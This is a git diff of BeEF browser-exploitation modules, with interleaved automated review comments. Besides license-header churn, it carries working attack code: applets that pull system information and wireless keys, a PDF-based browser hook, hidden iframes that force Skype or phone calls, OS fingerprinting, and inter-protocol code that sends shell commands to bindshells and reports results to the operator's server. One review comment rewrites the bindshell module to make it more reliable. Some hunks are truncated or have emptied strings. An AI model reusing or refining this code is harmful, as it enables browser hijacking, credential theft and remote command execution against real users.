@@ -1,25 +1,16 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var internal_counter = 0; var timeout = 30; var output; - beef.dom.attachApplet('getSystemInfo', 'getSystemInfo', 'getSystemInfo', "http://"+beef.net.host+":"+beef.net.port+"/", null, null); + beef.dom.attachApplet('getSystemInfo', 'getSystemInfo', 'getSystemInfo', beef.net.httpproto+"://"+beef.net.host+":"+beef.net.port+"/", null, null); if (beef.browser.isFF()) { diff --git a/modules/host/get_system_info/config.yaml b/modules/host/get_system_info/config.yaml index 7902a2381..6a05dd9ec 100644 --- a/modules/host/get_system_info/config.yaml +++ b/modules/host/get_system_info/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/host/get_system_info/getSystemInfo.java b/modules/host/get_system_info/getSystemInfo.java index e6f0f06f4..f90984200 100644 --- a/modules/host/get_system_info/getSystemInfo.java +++ b/modules/host/get_system_info/getSystemInfo.java @@ -1,3 +1,9 @@ +/* + * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + import java.applet.*; import java.awt.*; import java.net.*; @@ -146,7 +152,7 @@ public class getSystemInfo extends Applet { } } else { //Trying to insert the Beeffeine applet - content = ""; + content = ""; $j('body').append(content); internal_counter = 0; //We have to kick off a loop now, because the user has to accept the running of the applet perhaps diff --git a/modules/host/get_system_info/module.rb b/modules/host/get_system_info/module.rb index 128db8a54..d6057375a 100644 --- a/modules/host/get_system_info/module.rb +++ b/modules/host/get_system_info/module.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Get_system_info < BeEF::Core::Command diff --git a/modules/host/get_wireless_keys/command.js b/modules/host/get_wireless_keys/command.js index 54aec9505..8559a4637 100644 --- a/modules/host/get_wireless_keys/command.js +++ b/modules/host/get_wireless_keys/command.js 
@@ -1,20 +1,11 @@ -// -// Copyright 2011 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// +/* + * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + beef.execute(function() { - var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/wirelessZeroConfig.jar'; + var applet_archive = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/wirelessZeroConfig.jar'; var applet_id = '<%= @applet_id %>'; var applet_name = '<%= @applet_name %>'; var output; diff --git a/modules/host/get_wireless_keys/config.yaml b/modules/host/get_wireless_keys/config.yaml index 6bf1f7159..accab8546 100644 --- a/modules/host/get_wireless_keys/config.yaml +++ b/modules/host/get_wireless_keys/config.yaml 
@@ -1,18 +1,9 @@ # -# Copyright 2011 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # + beef: module: get_wireless_keys: diff --git a/modules/host/get_wireless_keys/module.rb b/modules/host/get_wireless_keys/module.rb index 0a3f75be2..30344837a 100644 --- a/modules/host/get_wireless_keys/module.rb +++ b/modules/host/get_wireless_keys/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Get_wireless_keys < BeEF::Core::Command 
diff --git a/modules/host/get_wireless_keys/wirelessZeroConfig.java b/modules/host/get_wireless_keys/wirelessZeroConfig.java index 8349d64a2..627a7db8c 100644 --- a/modules/host/get_wireless_keys/wirelessZeroConfig.java +++ b/modules/host/get_wireless_keys/wirelessZeroConfig.java @@ -1,3 +1,9 @@ +/* + * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + import java.io.*; import java.util.*; import java.net.*; diff --git a/modules/host/hook_default_browser/command.js b/modules/host/hook_default_browser/command.js index 2e565a778..b008bd100 100644 --- a/modules/host/hook_default_browser/command.js +++ b/modules/host/hook_default_browser/command.js @@ -1,21 +1,12 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { - var pdf_url = 'http://'+beef.net.host+ ':' + beef.net.port + '/report.pdf'; + var pdf_url = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/report.pdf'; window.open( pdf_url, '_blank'); beef.net.send('<%= @command_url %>', <%= @command_id %>, "Attempted to open PDF in default browser."); 
diff --git a/modules/host/hook_default_browser/config.yaml b/modules/host/hook_default_browser/config.yaml index 56c276653..e5550c11c 100644 --- a/modules/host/hook_default_browser/config.yaml +++ b/modules/host/hook_default_browser/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/host/hook_default_browser/module.rb b/modules/host/hook_default_browser/module.rb index bcb1488fb..f85f6e8af 100644 --- a/modules/host/hook_default_browser/module.rb +++ b/modules/host/hook_default_browser/module.rb 
@@ -1,24 +1,15 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Hook_default_browser < BeEF::Core::Command def self.options configuration = BeEF::Core::Configuration.instance - hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/report.html" + proto = configuration.get("beef.http.https.enable") == true ? "https" : "http" + hook_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/report.html" return [ #{'name' => 'url', 'ui_label'=>'URL', 'type' => 'text', 'width' => '400px', 'value' => hook_uri }, ] 
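Review bot: In `self.options` the newly added `proto` and the rebuilt `hook_uri` are never used, because the only array element that referenced `hook_uri` is commented out (`#{'name' => 'url', ...}`), so the method returns an empty list and both assignments are dead code; either restore the option or drop the two lines. The same scheme selection, `proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"`, is duplicated verbatim in the `pre_send` hunk that follows; a small private helper returning the hook URI would give both methods one source of truth. Whether `configuration.get` yields a boolean or the string `"true"` is not visible here, so the `== true` comparison should be checked against the config loader.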
@@ -26,11 +17,12 @@ class Hook_default_browser < BeEF::Core::Command def pre_send - #Get the servers configurations. - configuration = BeEF::Core::Configuration.instance + #Get the servers configurations. + configuration = BeEF::Core::Configuration.instance + proto = configuration.get("beef.http.https.enable") == true ? "https" : "http" #The hook url to be replace the token in the original pdf file. - hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/report.html" + hook_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/report.html" # A new pdf file containg the actual hook URI instead of the dummy token. configured_hook_file = File.open("./modules/host/hook_default_browser/bounce_to_ie_configured.pdf","w") diff --git a/modules/host/insecure_url_skype/command.js b/modules/host/insecure_url_skype/command.js index 6521d73bc..3d44fbe33 100644 --- a/modules/host/insecure_url_skype/command.js +++ b/modules/host/insecure_url_skype/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var sploit = beef.dom.createInvisibleIframe(); sploit.src = 'skype:<%= @tel_num %>?call'; 
diff --git a/modules/host/insecure_url_skype/config.yaml b/modules/host/insecure_url_skype/config.yaml index cb35a4c23..93573e876 100644 --- a/modules/host/insecure_url_skype/config.yaml +++ b/modules/host/insecure_url_skype/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/host/insecure_url_skype/module.rb b/modules/host/insecure_url_skype/module.rb index 2b19303ed..2098e45d2 100644 --- a/modules/host/insecure_url_skype/module.rb +++ b/modules/host/insecure_url_skype/module.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Insecure_url_skype < BeEF::Core::Command diff --git a/modules/host/iphone_tel/command.js b/modules/host/iphone_tel/command.js index 18966fc49..f52d271e8 100644 --- a/modules/host/iphone_tel/command.js +++ b/modules/host/iphone_tel/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var sploit = beef.dom.createInvisibleIframe(); sploit.src = 'tel:<%= @tel_num %>'; 
diff --git a/modules/host/iphone_tel/config.yaml b/modules/host/iphone_tel/config.yaml index 783637ed4..cae35d0eb 100644 --- a/modules/host/iphone_tel/config.yaml +++ b/modules/host/iphone_tel/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/host/iphone_tel/module.rb b/modules/host/iphone_tel/module.rb index 2d14f1c25..a2ebe4586 100644 --- a/modules/host/iphone_tel/module.rb +++ b/modules/host/iphone_tel/module.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Iphone_tel < BeEF::Core::Command diff --git a/modules/host/os_fingerprinting/command.js b/modules/host/os_fingerprinting/command.js new file mode 100644 index 000000000..2c56114f9 --- /dev/null +++ b/modules/host/os_fingerprinting/command.js 
@@ -0,0 +1,44 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + var os_version = new Array; + var dom = document.createElement('b'); + + Array.prototype.unique = function() { + var o = {}, i, l = this.length, r = []; + for(i=0; i", <%= @command_id %>, "windows_nt_version="+os_version.unique()); + }; + + // OS fingerprints // in the form of: "URI","NT version(s)" + var fingerprints = new Array( + new Array("5.1+","res://IpsmSnap.dll/wlcm.bmp"), + new Array("5.1+","res://wmploc.dll/257/album_0.png"), + new Array("5.1-6.0","res://wmploc.dll/23/images\amg-logo.gif"), + new Array("5.1-6.1","res://wmploc.dll/wmcomlogo.jpg"), + new Array("6.0+","res://wdc.dll/error.gif") + ); + + for (var i=0; i = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", irc_commands); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=IRC command sent"); + // clean up + cleanup = function() { + document.body.removeChild(irc_iframe_<%= @command_id %>); + } + setTimeout("cleanup()", 15000); + }); diff --git a/modules/ipec/inter_protocol_irc/config.yaml b/modules/ipec/inter_protocol_irc/config.yaml index 1341b4b7c..45f9a382a 100644 --- a/modules/ipec/inter_protocol_irc/config.yaml +++ b/modules/ipec/inter_protocol_irc/config.yaml 
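Review bot: `Array.prototype.unique = function() { ... }` in the new os_fingerprinting/command.js installs an enumerable method on the page's global `Array.prototype`, so every `for...in` loop over an array in the hooked page's own scripts now sees a `unique` key, and any `unique` the page already defined is silently replaced; a local `var unique = function(arr) { ... }` called as `unique(os_version)` avoids modifying shared prototypes. The `new Array` constructions for `os_version` and `fingerprints` would conventionally be array literals. This hunk is truncated in the rendering (the loop bodies are cut), so the remainder of the file could not be reviewed.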
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/ipec/inter_protocol_irc/module.rb b/modules/ipec/inter_protocol_irc/module.rb index cad8d0380..e4ad13045 100644 --- a/modules/ipec/inter_protocol_irc/module.rb +++ b/modules/ipec/inter_protocol_irc/module.rb 
@@ -1,27 +1,17 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Inter_protocol_irc < BeEF::Core::Command def self.options return [ - {'name' => 'server', 'ui_label' => 'IRC Server', 'value' => '127.0.0.1'}, - {'name' => 'port', 'ui_label' => 'Port', 'value' => '6667'}, - {'name' => 'nick', 'ui_label' => 'Username', 'value' => 'user1234__'}, - {'name' => 'channel', 'ui_label' => 'Channel', 'value' => '#channel1'}, - {'name' => 'message', 'ui_label' => 'Message', 'value' => 'Message sent from the Browser Exploitation Framework!'} + {'name' => 'rhost', 'ui_label' => 'IRC Server', 'value' => '127.0.0.1'}, + {'name' => 'rport', 'ui_label' => 'Port', 'value' => '6667'}, + {'name' => 'nick', 'ui_label' => 'Username', 'value' => 'user1234__'}, + {'name' => 'channel', 'ui_label' => 'Channel', 'value' => '#channel1'}, + {'name' => 'message', 'ui_label' => 'Message', 'value' => 'Message sent from the Browser Exploitation Framework!'} ] end diff --git a/modules/ipec/inter_protocol_posix_bindshell/command.js b/modules/ipec/inter_protocol_posix_bindshell/command.js index f8e228380..90bb06002 100644 --- a/modules/ipec/inter_protocol_posix_bindshell/command.js +++ b/modules/ipec/inter_protocol_posix_bindshell/command.js 
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var target_ip = "<%= @ip %>"; diff --git a/modules/ipec/inter_protocol_posix_bindshell/config.yaml b/modules/ipec/inter_protocol_posix_bindshell/config.yaml index 474d0940c..3c65d2aa7 100644 --- a/modules/ipec/inter_protocol_posix_bindshell/config.yaml +++ b/modules/ipec/inter_protocol_posix_bindshell/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: 
diff --git a/modules/ipec/inter_protocol_posix_bindshell/module.rb b/modules/ipec/inter_protocol_posix_bindshell/module.rb index 063cb66d7..0683df646 100644 --- a/modules/ipec/inter_protocol_posix_bindshell/module.rb +++ b/modules/ipec/inter_protocol_posix_bindshell/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # =begin [+] Summary: diff --git a/modules/ipec/inter_protocol_win_bindshell/command.js b/modules/ipec/inter_protocol_win_bindshell/command.js index 4d4729420..7fbe8b05e 100644 --- a/modules/ipec/inter_protocol_win_bindshell/command.js +++ b/modules/ipec/inter_protocol_win_bindshell/command.js 
@@ -1,88 +1,46 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { - var target_ip = "<%= @ip %>"; - var target_port = "<%= @port %>"; - var cmd = "<%= @cmd %>"; - var timeout = "<%= @command_timeout %>"; - var internal_counter = 0; - - cmd += " & echo __END_OF_WIN_IPC<%= @command_id %>__ & echo
\"\" & echo
\"\""; - - var iframe = document.createElement("iframe"); - iframe.setAttribute("id","ipc_win_window_<%= @command_id %>"); - iframe.setAttribute("style", "visibility:hidden;width:1px;height:1px;"); - document.body.appendChild(iframe); - - function do_submit(ip, port, content) { - - var action = "http://" + ip + ":" + port + "/index.html?&cmd&"; - var parent = window.location.href; - - myform=document.createElement("form"); - myform.setAttribute("name","data"); - myform.setAttribute("method","post"); - myform.setAttribute("enctype","multipart/form-data"); - myform.setAttribute("action",action); - document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.document.body.appendChild(myform); - - myExt = document.createElement("INPUT"); - myExt.setAttribute("id",<%= @command_id %>); - myExt.setAttribute("name",<%= @command_id %>); - myExt.setAttribute("value",content); - myform.appendChild(myExt); - myExt = document.createElement("INPUT"); - myExt.setAttribute("id","endTag"); - myExt.setAttribute("name","
"); - myExt.setAttribute("value","echo window.location='"+parent+"#ipc_result='+encodeURI(document.getElementById(\"ipc_content\").innerHTML);\"\" & exit"); - - myform.appendChild(myExt); - myform.submit(); + // validate payload + try { + var cmd = '<%= @commands.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>'; + } catch(e) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString()); + return; } - function waituntilok() { - - try { - if (/#ipc_result=/.test(document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.location)) { - ipc_result = document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.location.href; - output = ipc_result.substring(ipc_result.indexOf('#ipc_result=')+12,ipc_result.lastIndexOf('__END_OF_WIN_IPC<%= @command_id %>__')); - beef.net.send('<%= @command_url %>', <%= @command_id %>, "result="+decodeURI(output.replace(/%0A/gi, "
")).replace(//g, ">").replace(/<br>/gi, "
")); - document.body.removeChild(iframe); - return; - } else throw("command results haven't been returned yet"); - } catch (e) { - internal_counter++; - if (internal_counter > timeout) { - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Timeout after '+timeout+' seconds'); - document.body.removeChild(iframe); - return; - } - setTimeout(function() {waituntilok()},1000); - } + // validate target host + var rhost = "<%= @rhost %>"; + if (!rhost) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target host'); + return; } - if (!target_port || !target_ip || isNaN(target_port)) { - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed target host or target port'); - } else if (target_port > 65535 || target_port < 0) { + // validate target port + var rport = "<%= @rport %>"; + if (!rport || rport > 65535 || rport < 0 || isNaN(rport)) { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target port'); - } else { - do_submit(target_ip, target_port, cmd); - waituntilok(); + return; } + // validate timeout + var timeout = "<%= @timeout %>"; + if (isNaN(timeout)) timeout = 30; + + // send commands + var win_ipec_form_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html?&cmd&", cmd + " & exit"); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Shell commands sent'); + + // clean up + cleanup = function() { + document.body.removeChild(win_ipec_form_<%= @command_id %>); + } + setTimeout("cleanup()", timeout * 1000); + }); diff --git a/modules/ipec/inter_protocol_win_bindshell/command.old.js b/modules/ipec/inter_protocol_win_bindshell/command.old.js new file mode 100644 index 000000000..909637463 --- /dev/null +++ b/modules/ipec/inter_protocol_win_bindshell/command.old.js 
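Review bot: The `// validate payload` try/catch is ineffective: if a character in `@commands` survives the two `gsub` calls and breaks the quoted literal (a backslash or a line break does), the error is a parse-time SyntaxError raised before the try block ever runs, so the `fail=malformed payload` branch can never fire; the comment should at least say so, and encoding the value server-side (JSON or Base64) instead of quote-escaping it would remove the failure mode. The port check keeps `rport` as a string, so `!rport` is false for any non-empty value and `"0"`, `"80.5"` or a blank string all pass, and `timeout` likewise stays a string — an empty value passes `isNaN("")` and schedules the iframe removal after 0 ms, which may cancel the pending submission. Further down, `cleanup = function() {...}` creates an implicit global only so that the string form `setTimeout("cleanup()", ...)` can find it; a closure needs neither. The rewrite below parses both numbers once and replaces the string-eval timer; the `createIframeIpecForm` call and the `result=Shell commands sent` report are unchanged.
```javascript
  // validate target port: parse once so "0", "80.5" and blank values are rejected
  var rport = Number("<%= @rport %>");
  if (!(rport >= 1 && rport <= 65535 && rport % 1 === 0)) {
    beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target port');
    return;
  }

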